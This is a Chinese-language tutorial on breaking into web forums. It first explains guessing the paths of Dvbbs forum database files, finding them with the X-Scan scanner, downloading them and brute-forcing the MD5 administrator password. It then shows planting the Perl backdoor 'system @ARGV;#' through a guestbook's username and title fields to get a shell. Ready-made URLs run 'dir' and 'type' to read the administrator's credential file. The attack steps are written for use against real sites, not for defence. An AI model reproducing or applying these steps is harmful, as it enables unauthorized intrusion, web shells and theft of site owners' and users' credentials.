论坛通用入侵一条龙教学

　　第一招：霸王硬上弓破解论坛数据库

　　目前很多国内论坛都采用了动网先锋引擎（一款由ASPSKY.NET开发和维护的asp论坛引擎）。要想控制整个论坛就得有管理员密码，怎样才能得到动网论坛的管理员密码呢？黑客常用的招数之一是先获得动网论坛的数据库文件，然后再破解数据库中的管理员密码，不过该数据库文件中的密码是用MD5加密的，所以要使用工具软件进行破解。举个例子，黑客会可以先猜一下数据库文件存放在哪个目录里，如果猜对的话下载数据库的成功率就比较高了。一般说来，管理员都有个习惯，就是给数据库文件存放的目录起个好记的名字，如data、database、bd、mdb等。所以黑客们可以在浏览器中输入：http://www.target.com/database或http://www.target.com/mdb或者是http://www.target.com/db试试，如果显示“HTTP错误404-找不到文件”，说明对方没有这个目录，再换一个目录名试试，假设你输入http://www.target.com/data，显示“HTTP错误403-禁止访问”，则说明对方有这个目录，但是不允许我们浏览该目录，这样就有希望了！

　　下一步只要有办法找到数据库文件并下载下来就有希望得到对方的管理员密码。比方说，黑客可以使用漏洞扫描器X-SCAN扫描目标，看是否有漏洞，如果目标做了端口过滤，只开了80端口，我们可以这样试试：把一些常用的数据库地址如data.mdb、db.mdb、database.asp等添加到X-Scan的CGI数据库中，或者用一些黑客字典来生成数据库地址，然后单独作一个数据库，把它添加到X-Scan的CGI数据库中。然后只扫描CGI漏洞，过一段时间扫描完毕，假设显示的扫描结果为“/data/database.asp”，就表示我们成功地扫描到了数据库文件。现在用下载工具把数据库下载下来即可，然后把文件扩展名改为.mdb。接下来就可以使用MD5的暴力破解程序和字典解出密码。不要小瞧了这个办法，许多人就是这样破解了你的论坛管理员密码！

 　  第二招：暗渡陈仓形成网页后门

　　大家知道，在cgi或perl程序里如果写入“system @ARGV;#”（注意输入时没有引号），就会形成一个有趣的网页后门。在IE地址栏中输入http://ip/*.pl?dir就会看到网站的物理目录。以网上非常流行的Agbii免费cgi留言本为例，该留言本里的留言是以第n条留言的数目、用户名、标题和内容等等来排列的，而且留言都是按照顺序排放在一个固定目录data/用户名下面的。说起来好像很复杂，让我们来看图7，假设这是黑客在Agbii免费cgi留言本中的留言，它是该留言本中的第14条留言，假设其注册的用户名是;system，标题为@ARGV;#，内容则是“呵呵”，在data/222目录下的14.pl的文件内容就是如图8所示。由于此留言本的用户就是222，因此只要黑客在浏览器地址栏中输入http://IP/book/data/222/14.pl?dir就会得到一个shell了（图9）。注意这里的http://IP/book/是留言本的地址。得到shell之后，黑客还可以得到该管理员的密码！只要在浏览器的地址栏中输入“http://IP/book/data/管理员名字/14.pl?type+该留言本的物理目录\user\管理员名字.cgi”就可以了。以本文为例，只要输入“http://www.xxx.com/book/data/lxgyp/14.pl?type+d:\虚拟主机\web\book\user\lxgyp.cgi”就可以得到该管理员的用户名和密码、注册时的邮件地址、他的网站地址、IP地址以及登陆时间，一目了然，尽在掌握！